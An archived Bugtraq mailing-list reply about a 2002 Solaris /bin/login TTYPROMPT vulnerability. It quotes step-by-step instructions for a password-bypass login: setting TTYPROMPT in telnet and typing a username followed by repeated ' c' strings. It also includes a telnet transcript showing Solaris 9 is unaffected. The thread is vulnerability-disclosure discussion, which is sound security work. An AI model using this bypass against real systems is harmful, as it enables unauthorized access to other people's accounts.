Bugtraq mailing list archives
Re: Solaris 2.6, 7, 8
From: Ido Dubrawsky <idubraws () cisco com>
Date: Wed, 2 Oct 2002 14:16:28 -0500
On Wed, Oct 02, 2002 at 12:13:09PM -0400, Jonathan S wrote:
Hello, Solaris 2.6, 7, and 8 /bin/login has a vulnerability involving the environment variable TTYPROMPT. This vulnerability has already been reported to BugTraq and a patch has been released by Sun. However, a very simple exploit, which does not require any code to be compiled by an attacker, exists. The exploit requires the attacker to simply define the environment variable TTYPROMPT to a 6 character string, inside telnet. I believe this overflows an integer inside login, which specifies whether or not the user has been authenticated (just a guess). Once connected to the remote host, you must type the username, followed by 64 " c"s, and a literal "\n". You will then be logged in as the user without any password authentication. This should work with any account except root (unless remote root login is allowed).
Looks like Solaris 9 is not vulnerable to this: [idubraws@elrond idubraws] 6 $ telnet telnet> environ define TTYPROMPT abcdef telnet> o 192.168.155.2 Trying 192.168.155.2... Connected to 192.168.155.2. Escape character is '^]'. SunOS 5.9 login: It automatically drops you to the login prompt. Perhaps this is fixed by a patch that got rolled into 9? Ido -- =============================================================================== |Ido Dubrawsky E-mail: idubraws () cisco com | | |Network Consulting Engineer :|: :|: |VSEC Technical Marketing, SAFE Architecture :|||: :|||: |Cisco Systems, Inc. .:|||||||:..:|||||||:. |Austin, TX. 78759 ===============================================================================
Attachment:
_bin
Description:
Current thread:
- Solaris 2.6, 7, 8 Jonathan S (Oct 02)
- Re: Solaris 2.6, 7, 8 Dave Ahmad (Oct 02)
- Re: Solaris 2.6, 7, 8 buzheng (Oct 02)
- Re: Solaris 2.6, 7, 8 tb0b (Oct 03)
- Re: Solaris 2.6, 7, 8 Marco Ivaldi (Oct 03)
- Re: Solaris 2.6, 7, 8 Sebastian (Oct 05)
- Re: Solaris 2.6, 7, 8 Christopher X. Candreva (Oct 02)
- Re: Solaris 2.6, 7, 8 Gert-Jan Hagenaars (Oct 03)
- Re: Solaris 2.6, 7, 8 buzheng (Oct 02)
- Re: Solaris 2.6, 7, 8 Ido Dubrawsky (Oct 03)
- Re: Solaris 2.6, 7, 8 Ramon Kagan (Oct 03)
- Re: Solaris 2.6, 7, 8 Roy Kidder (Oct 03)
- Re: Solaris 2.6, 7, 8 Ramon Kagan (Oct 03)
- <Possible follow-ups>
- RE: Solaris 2.6, 7, 8 Sinan Eren (Oct 02)
- Re: Solaris 2.6, 7, 8 Dan Diamond (Oct 03)
- RE: Solaris 2.6, 7, 8 Morgan (Oct 04)
- Re: Solaris 2.6, 7, 8 Dave Ahmad (Oct 02)